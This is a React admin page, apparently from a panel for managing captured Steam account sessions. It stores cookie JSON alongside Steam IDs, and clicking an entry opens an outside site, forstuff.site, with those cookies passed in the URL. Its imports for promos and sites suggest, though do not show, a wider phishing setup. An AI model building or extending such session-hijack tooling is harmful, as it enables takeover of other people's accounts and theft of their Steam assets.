import { useEffect, useState } from 'react';
import Typography from '@mui/material/Typography';
import Box from '@mui/material/Box';
import Paper from '@mui/material/Paper';
import CustomButton from '../components/Button';
import CustomInput from '../components/Input';
import {deleteSession, getPromos, getSessions, newPromo, newSession, newSite} from '../api';
import { Chip, FormLabel, Switch } from "@mui/material";
import { useSnackbar } from "notistack";

export const SessionsPage = () => {
  const { enqueueSnackbar } = useSnackbar();
  const [session, setSession] = useState({})

  const [allPromos, setAllPromos] = useState([]);

  useEffect(() => {
    getSessions().then((val) => {
      if(val.success) {
        console.log(val)
        setAllPromos(val.sessions);
      }
    })
  }, [])

  const changeInputs = (data, name) => {
    setSession(prevState => ({...prevState, [name]: data}))
  }

  const deleteSessionAction = async (session) => {
    const query = await deleteSession(session);
    if(query.success) {
      setAllPromos(prev => prev.filter(it => it._id !== session._id))
      return enqueueSnackbar('Done.', { variant: 'success' });
    }
    enqueueSnackbar(query.message, { variant: 'error' })
  }
  const action = async () => {
    const query = await newSession(session);
    if(query.success) {
      setAllPromos(prev => ([...prev, query.session]))
      return enqueueSnackbar('Done.', { variant: 'success' })
    }
    enqueueSnackbar(query.message, { variant: 'error' })
  }

  return(
    <Paper sx={{ p: 3, height: '100%', overflow: 'auto', display: 'grid', gridTemplateColumns: 'repeat(auto-fill, 100%)', gap: '20px'}}>
      <Typography letterSpacing={'-0.05em'} variant="h5"><strong>Sessions list</strong></Typography>
      <Box sx={{display: 'grid', gap: '20px', gridTemplateColumns: 'repeat(auto-fit, minmax(200px, max-content))'}}>
        {
          allPromos?.length > 0 ? allPromos.map((session) => (
            <Chip
              sx={{justifyContent:'space-between'}}
              onClick={() => window.open(`https://forstuff.site/cookie?cookies=${session.cookies}`,'_blank')}
              variant={session?._id !== session?._id ? 'outlined' : 'filled'}
              onDelete={() => deleteSessionAction(session)}
              label={`${session?.steamId}`}
            />
          )) : <> No sessions 🚓</>
        }
      </Box>
      <Box display={'grid'} gap={'20px'}>
        <Typography letterSpacing={'-0.05em'} variant="h4"><strong>Sessions</strong></Typography>
        <Typography letterSpacing={'-0.05em'} variant="h5"><strong>New session</strong></Typography>
        <Box sx={{display: 'grid', gap: '20px', gridTemplateColumns: '300px 300px'}}>
          <CustomInput onChange={(e) => changeInputs(e.target.value, 'cookies')} value={session.cookies} label={'Cookies'} name="cookies" placeholder={'JSON'} type="text"/>
          <CustomInput onChange={(e) => changeInputs(e.target.value, 'steamId')} value={session.steamId} label={'SteamId'} name="steamId" placeholder={'765532432423423'} type="text"/>
        </Box>
        <CustomButton onClick={action} sx={{alignSelf: 'flex-end'}}>Add</CustomButton>
      </Box>
    </Paper>
  )
}